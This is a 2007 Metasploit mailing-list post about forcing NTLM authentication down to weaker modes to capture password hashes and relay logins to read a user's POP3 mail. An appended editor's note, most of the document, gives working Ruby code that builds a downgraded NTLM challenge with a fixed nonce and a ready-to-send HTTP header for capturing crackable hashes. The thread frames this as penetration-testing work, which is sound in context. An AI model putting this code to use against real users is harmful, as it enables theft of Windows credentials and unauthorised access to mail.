Metasploit mailing list archives

Windows Transparent Authentication updates


From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 16 Nov 2007 09:44:33 -0600

Yesterday I submitted ticket #169 to update the NTLMSSP type code
support in proto/smb/ui.rb. It adds a function to force negotiation away
from NTLMv2 and signing as well as use bitmasking.

This now makes it possible to support things like NTLM hash capturing
with a predefined nonce over HTTP, IMAP, POP3, or NNTP. I've not written
any auxiliary/exploit modules for this yet mostly due to lack of time
but I do have code available:

http://grutz.jingojango.net/exploits/pokehashball.html

I've also coded up a protocol proxy that will take the authentication
messages from HTTP and relay them between a POP3 server to download all
available mail for a user. It's very brute-force at the moment but it
does work. If I get some time to complete the entire tool I have in my
head it'll include HTTP and IMAP proxying and more intelligent support
for holding on to the browser and requesting authentication at-will.

Check out Rsnake's blog on an idea to use DNS Pinning to fake out IE's trust zone -
http://ha.ckers.org/blog/20071112/effects-of-dns-rebinding-on-ies-trust-zones/

Very interesting theory but not sure it'll work that well given you need
a very specific set of circumstances for transparent authentication to
work in IE:

1. URL must be an internal IP address or hostname (no FQDN)
2. Server must send the correct domain workstation is a member of
3. Server must not be accessed via the proxy

That kind of limits attacks from the Internet for a large majority of
locations but doesn't make it impossible. I'm excited!

If anyone has any activex code that could turn a browser into a usable
proxy however... let me know. Half the battle with transparent auth is
getting the browser to think it's talking to a "Trusted Intranet"
computer. Having a machine on the inside is easiest so this attack is
best served when you're on-site doing a penetration test.

So, enjoy! If you want to give a hand on writing some usable modules or
expanding the existing project let me know.

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."
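[Editor's note, not part of the original message.] The negotiation trick
described above (answering a client's Type 1 with a Type 2 that carries a
fixed server challenge and has the signing and NTLM2 session-security bits
masked out) is easiest to see in code. The block below is an added example
written for this archive; it is not Grutzmacher's pokehashball code and not
Metasploit's proto/smb/ui.rb. Flag names and offsets follow MS-NLMP; the
fixed challenge 1122334455667788 is the value precomputed tables are built
against and is chosen here as an assumption, the Type 1 blob is constructed
inline for the demonstration, and the target name WORKGROUP is arbitrary.
One caveat a practitioner will want: the mask only controls what the server
advertises. Whether a client actually answers with an NTLMv1 response or
insists on NTLMv2 is decided by its own LmCompatibilityLevel policy, not by
these flags, so capture the response and check its length before assuming
the table applies.

```ruby
require 'base64'

# NTLMSSP negotiate flags (MS-NLMP 2.2.2.5). Only the bits used here are listed.
NTLMSSP_NEGOTIATE_UNICODE      = 0x00000001
NTLMSSP_NEGOTIATE_OEM          = 0x00000002
NTLMSSP_REQUEST_TARGET         = 0x00000004
NTLMSSP_NEGOTIATE_SIGN         = 0x00000010
NTLMSSP_NEGOTIATE_SEAL         = 0x00000020
NTLMSSP_NEGOTIATE_NTLM         = 0x00000200
NTLMSSP_NEGOTIATE_ALWAYS_SIGN  = 0x00008000
NTLMSSP_TARGET_TYPE_DOMAIN     = 0x00010000
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000 # "NTLM2" session security
NTLMSSP_NEGOTIATE_TARGET_INFO  = 0x00800000
NTLMSSP_NEGOTIATE_VERSION      = 0x02000000
NTLMSSP_NEGOTIATE_KEY_EXCH     = 0x40000000

SIGNATURE = "NTLMSSP\0".b

# Bits a hash-capture server masks out of the client's offer: we never finish
# the session so signing/sealing/key exchange are pointless, extended session
# security would mix a client nonce into the response (defeating a precomputed
# table keyed on our fixed challenge), and VERSION would force an 8-byte version
# field into the Type 2 layout.
STRIP_FLAGS = NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_SEAL |
              NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_KEY_EXCH |
              NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | NTLMSSP_NEGOTIATE_VERSION |
              NTLMSSP_NEGOTIATE_TARGET_INFO

# Assumed fixed server challenge (the value precomputed tables are built against).
FIXED_CHALLENGE = "\x11\x22\x33\x44\x55\x66\x77\x88".b

# Returns the NegotiateFlags offered in a Type 1 (NEGOTIATE_MESSAGE) blob.
def parse_type1(blob)
  raise 'not an NTLMSSP message' unless blob[0, 8] == SIGNATURE
  type = blob[8, 4].unpack1('V')
  raise "expected Type 1, got #{type}" unless type == 1
  blob[12, 4].unpack1('V')
end

# Builds a Type 2 (CHALLENGE_MESSAGE) from the client's flags: strip the
# unwanted bits, pick one character set, and plant the fixed challenge.
def build_type2(client_flags, challenge: FIXED_CHALLENGE, target: 'WORKGROUP')
  raise 'challenge must be 8 bytes' unless challenge.bytesize == 8
  flags = (client_flags & ~STRIP_FLAGS) |
          NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_REQUEST_TARGET | NTLMSSP_TARGET_TYPE_DOMAIN
  unicode = (flags & NTLMSSP_NEGOTIATE_UNICODE) != 0
  flags &= ~NTLMSSP_NEGOTIATE_OEM if unicode        # server answers in one charset only
  target_bytes = unicode ? target.encode('UTF-16LE').b : target.b
  header_len = 48                                    # fixed header without Version field
  [
    SIGNATURE,
    [2].pack('V'),                                   # MessageType
    [target_bytes.bytesize, target_bytes.bytesize, header_len].pack('vvV'), # TargetNameFields
    [flags].pack('V'),                               # NegotiateFlags
    challenge,                                       # ServerChallenge
    "\0".b * 8,                                      # Reserved
    [0, 0, header_len + target_bytes.bytesize].pack('vvV'), # empty TargetInfoFields
    target_bytes
  ].join
end

# Reads back the fields of a Type 2 blob, to check what the client will see.
def parse_type2(blob)
  raise 'not an NTLMSSP message' unless blob[0, 8] == SIGNATURE
  raise 'not a Type 2 message' unless blob[8, 4].unpack1('V') == 2
  tlen, _tmax, toff = blob[12, 8].unpack('vvV')
  { flags: blob[20, 4].unpack1('V'), challenge: blob[24, 8], target: blob[toff, tlen] }
end

# The header an HTTP capture server sends with its 401 to carry the Type 2.
def www_authenticate_header(type2)
  "WWW-Authenticate: NTLM #{Base64.strict_encode64(type2)}"
end

# Constructed Type 1 for the demo: a typical browser offer with UNICODE, OEM,
# REQUEST_TARGET, NTLM, ALWAYS_SIGN, extended session security, VERSION, 128, 56.
def sample_type1
  flags = 0xa2088207
  [SIGNATURE, [1].pack('V'), [flags].pack('V'),
   [0, 0, 40].pack('vvV'), [0, 0, 40].pack('vvV'), "\0".b * 8].join
end

if $PROGRAM_NAME == __FILE__
  t2 = build_type2(parse_type1(sample_type1))
  puts www_authenticate_header(t2)
  puts format('negotiated flags: 0x%08x', parse_type2(t2)[:flags])
end
```

Running it prints the header line to paste into a 401 response and the
masked flag word (0xa0010205 for the constructed offer: extended session
security, ALWAYS_SIGN and VERSION gone, OEM dropped in favour of Unicode).
The same build_type2 output serves IMAP, POP3 or NNTP; only the transport
wrapper around the base64 blob changes.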
